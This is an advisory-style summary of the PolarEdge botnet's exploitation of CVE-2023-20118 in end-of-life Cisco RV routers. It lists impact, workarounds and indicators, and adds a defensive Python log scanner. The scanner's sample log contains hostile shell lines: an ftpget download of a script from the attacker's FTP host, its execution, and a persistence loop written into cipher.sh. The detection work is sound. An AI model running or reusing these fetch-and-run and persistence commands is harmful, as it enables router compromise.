Full Report
A new malware campaign has been observed targeting edge devices from Cisco, ASUS, QNAP, and Synology to rope them into a botnet named PolarEdge since at least the end of 2023. French cybersecurity company Sekoia said it observed the unknown threat actors leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and
Analysis Summary
# Vulnerability: Arbitrary Command Execution in Cisco Small Business Routers (PolarEdge Botnet Target)
## CVE Details
- CVE ID: CVE-2023-20118
- CVSS Score: 6.5 (Medium)
- CWE: Not explicitly provided in the source; the behaviour described (arbitrary command execution) is most likely CWE-78 (OS Command Injection)
## Affected Systems
- Products: Cisco Small Business RV Series Routers
- Versions: RV016, RV042, RV042G, RV082, RV320, RV325
- Configurations: Devices running vulnerable firmware, particularly those with remote management enabled or accessible.
## Vulnerability Description
CVE-2023-20118 is a security flaw in specific models of Cisco Small Business RV series routers that allows for arbitrary command execution. Threat actors are actively exploiting this to compromise the devices and install the "PolarEdge" botnet implant, a TLS backdoor capable of executing remote commands.
## Exploitation
- Status: Exploited in the wild (Targeted by the PolarEdge botnet campaign since late 2023)
- Complexity: Likely Medium (Requires initial access facilitated by the vulnerability)
- Attack Vector: Network (Likely via management interfaces)
## Impact
- Confidentiality: High (Implied through command execution and data collection capabilities of the backdoor)
- Integrity: High (Arbitrary command execution allows full system compromise)
- Availability: Medium/High (Device compromised and repurposed for botnet activities)
## Remediation
### Patches
- **No Patches Available:** These routers have reached End-of-Life (EoL), and Cisco will not be releasing further security updates.
### Workarounds
- Disable remote management interfaces on the affected routers.
- Block external access (ingress traffic) to ports 443 and 60443 on the affected devices.
## Detection
- **Indicators of Compromise (IOCs):**
  - Presence of shell scripts named `q` retrieved via FTP (potentially from 119.8.186[.]227).
  - Execution of a binary named `cipher_log`.
  - Persistence mechanism modifying `/etc/flash/etc/cipher.sh` to launch `cipher_log` repeatedly.
  - Outbound TLS connections originating from the device to command-and-control servers.
- **Detection Methods and Tools:** Monitor system logs and network traffic for unusual FTP transfers and command execution attempts on these edge devices. Specialized IoT/network monitoring tools may be necessary to detect the TLS backdoor activity.
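The following is an added example, not code from the report, Cisco, or Sekoia, showing how the host-side indicators above can be turned into simple log-scanning rules. Only the indicator strings (the file name `q`, the FTP host, `cipher_log`, and `/etc/flash/etc/cipher.sh`) come from the report; the log line format, the rule names, and the sample lines are constructed for illustration and do not reproduce real PolarEdge samples. The `likely_compromised` threshold (two distinct indicators) is an assumption chosen here to separate a single ambiguous hit from a cluster of matching behaviour.

```python
"""Scan device logs for the PolarEdge host indicators listed in the report.

Added example (not from the report, Cisco or Sekoia). Log lines are
constructed; only the indicator strings come from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Indicator from the report, written un-defanged so it matches real log text.
FTP_HOST = "119.8.186.227"

# Each rule is (name, compiled pattern). Patterns are kept narrow so that
# ordinary router activity does not trigger them. Rule names are hypothetical.
RULES = [
    # A file named exactly "q" pulled over FTP (busybox ftpget, ftp, ftp:// URLs).
    ("ftp_fetch_script_q",
     re.compile(r"\bftp(?:get)?\b.*(?<![\w.-])q(?![\w.-])", re.IGNORECASE)),
    # Any reference to the FTP host named in the report.
    ("known_ftp_host", re.compile(re.escape(FTP_HOST))),
    # Execution of (or reference to) the implant binary "cipher_log".
    ("cipher_log_exec", re.compile(r"(?<![\w.-])cipher_log(?![\w.-])")),
    # Touching the persistence script the report describes.
    ("cipher_sh_persistence", re.compile(r"/etc/flash/etc/cipher\.sh")),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    line: str


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per (rule, line) pair that matches, in log order."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.rstrip("\n")
        if not line:
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count hits per rule, useful for a quick triage view."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def likely_compromised(findings: List[Finding], min_rules: int = 2) -> bool:
    """Assumed triage rule: several distinct indicators together are treated
    as a probable compromise; a single hit is flagged for manual review only."""
    return len({f.rule for f in findings}) >= min_rules


# Constructed sample log, modelled on the report's narrative (not real data).
SAMPLE_LOG = """\
Jan 12 03:14:07 rv042 sh: wget http://192.0.2.10/firmware.bin
Jan 12 03:14:09 rv042 sh: ftpget -u anonymous 119.8.186.227 /tmp/q q
Jan 12 03:14:10 rv042 sh: sh /tmp/q
Jan 12 03:14:12 rv042 sh: echo 'while true; do /tmp/cipher_log; sleep 60; done' >> /etc/flash/etc/cipher.sh
Jan 12 03:14:13 rv042 sh: /tmp/cipher_log
Jan 12 03:15:00 rv042 cron: run-parts /etc/cron.hourly
""".splitlines()

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f.line_no:>3} [{f.rule}] {f.line}")
    print(summarize(found))
    print("likely compromised:", likely_compromised(found))
```

Feed `scan_log` the device's syslog or shell-history export; the FTP host rule alone fires on any mention of the address, so it is the noisiest of the four and is best read together with the other hits rather than on its own. Outbound TLS beacons from the device to command-and-control servers are not visible in host logs and still need network-level monitoring, as the report notes.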
## References
- Vendor Advisory: hxxps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5
- Threat Analysis: hxxps://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/